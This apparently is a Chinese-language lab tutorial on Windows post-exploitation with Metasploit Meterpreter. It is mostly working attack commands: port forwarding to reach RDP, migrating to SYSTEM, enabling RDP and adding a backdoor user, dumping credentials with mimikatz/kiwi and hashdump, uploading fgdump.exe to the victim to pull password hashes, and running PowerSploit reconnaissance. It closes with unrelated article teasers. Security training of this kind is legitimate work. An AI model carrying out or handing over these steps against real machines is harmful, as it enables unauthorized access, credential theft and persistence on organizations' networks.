当恶意攻击者入侵企业之後,会从第一台入口点开始往内部进行攻击,有些企业会使用 Windows AD 进行权限控管,因此线在对於 Windwos AD 的安全性也很重要。
接续昨天的情境,第一台入口机器被植入 Meterpreter 後门之後,可以用那些指令进行後渗透。
use post/multi/manage/shell_to_meterpreter
set session 1
run
实验期间有可能会有 shell 不稳的状态,多尝试几次!
当受害主机可能开启了 RDP (远端桌面)但因为防火墙阻挡或其他原因,导致无法连到受害主机,因此可以将受害主机的 port 转发到攻击主机,直接存取攻击主机的转发过来的 port 就可以连接到受害主机的 port,我们透过指令 portfwd
进行测试。
转发指定端口
portfwd add -l 3389 -p 3389 -r [target]
参数 | 说明 |
---|---|
-l | 监听的 port |
-p | 受害主机的 port |
-r | 受害主机IP |
确认目前已经转发的 port
portfwd list
确认攻击主机是否有监听 3389
netstat -antup
安装 rdesktop
sudo apt install rdesktop
进行本地连线
rdesktop 127.0.0.1:3389
主要连线连到本机(127.0.0.1)的 3389 port,但因为 port 已经转发到受害主机的 3389,因此连线画面其实是受害主机的连线画面。
删除转发的 port
portfwd delete -l 3389 -p 3389 -r [target]
一次删除所有 portfwd
portfwd flush
ps
migrate <PID>
合并,可以用 getuid 确认background
,并且查看 sessions 确认自己已经提权到 SYSTEMuse post/windows/mange/enable_rdp
5. 设定参数
set username feifei
set password feitest
set session 1
run
load mimikatz
因为现在 mimikatz 已经合并,因此直接使用 load kiwi
查看所有帐号密码
creds_all
查看所有 kerberos 密码
creds_kerberos
查看所有 msv 密码
creds_msv
查看所有 wdigest 密码
creds_wdigest
查看版本
kiwi_cmd version
使用 mimikatz 的指令
kiwi_cmd <mimikatz模组>
kiwi_cmd ::
查看 mimikatz 的模组
查看 sekurlsa 模组
kiwi_cmd sekurlsa::
使用 sekurlsa 中的 msv 指令
kiwi_cmd sekurlsa::msv
load powershell
powershell_execute
执行 powershell 指令powershell_import
引用其他工具powershell_shell
直接进行互动powershell_execute "$PSVersionTable"
下载後渗透工具
git clone https://github.com/PowerShellMafia/PowerSploit
确认我们需要的工具
** import 指定工具**
将工具 load 进去
powershell_import "/home/user/PowerSploit/Recon/PowerView.ps1"
powershell_execute Get-NetLoggedon
可直接使用 powershell 互动
powershell_shell
$PSVersionTable
hashdump
档案:https://github.com/interference-security/kali-windows-binaries/blob/master/fgdump/fgdump.exe
将这个 exe 下载到家目录。
上传 fgdump.exe 到受害主机
upload /home/user/fgdump.exe C:\\
进入 shell 模式
shell
切换到 C
cd ..
cd ..
执行 fgdump.exe
fgdump.exe
确认档案名称
dir
127.0.0.1pwdump
查看 hash
type 127.0.0.1pwdump
下载指定档案
download 127.0.0.1pwdump
使用 rockyou 字典档爆破密码
>>: 2.4.17 Design System - Tooltip
大家好,我是YIYI,今天我要来和大家聊聊为什麽需要规格表简介架构图。 为什麽需要规格表? 规格表就...
引言 昨天完成了最基本的一题,学了一些基本操作。 cat, wget 等,都是必备的工具,一定要学...
更多会员限定文章可以到patreon观看 WSLg + Snap 如果清除/snap後还是不能mou...
QC+ 程序语言 Python 3 _ 408 奇偶数个数计算 说明: 请撰写一程序,让使用者输入十...
GitHub Action 的 workflow 是以 YAML 档案进行设定 (副档名为 .yml...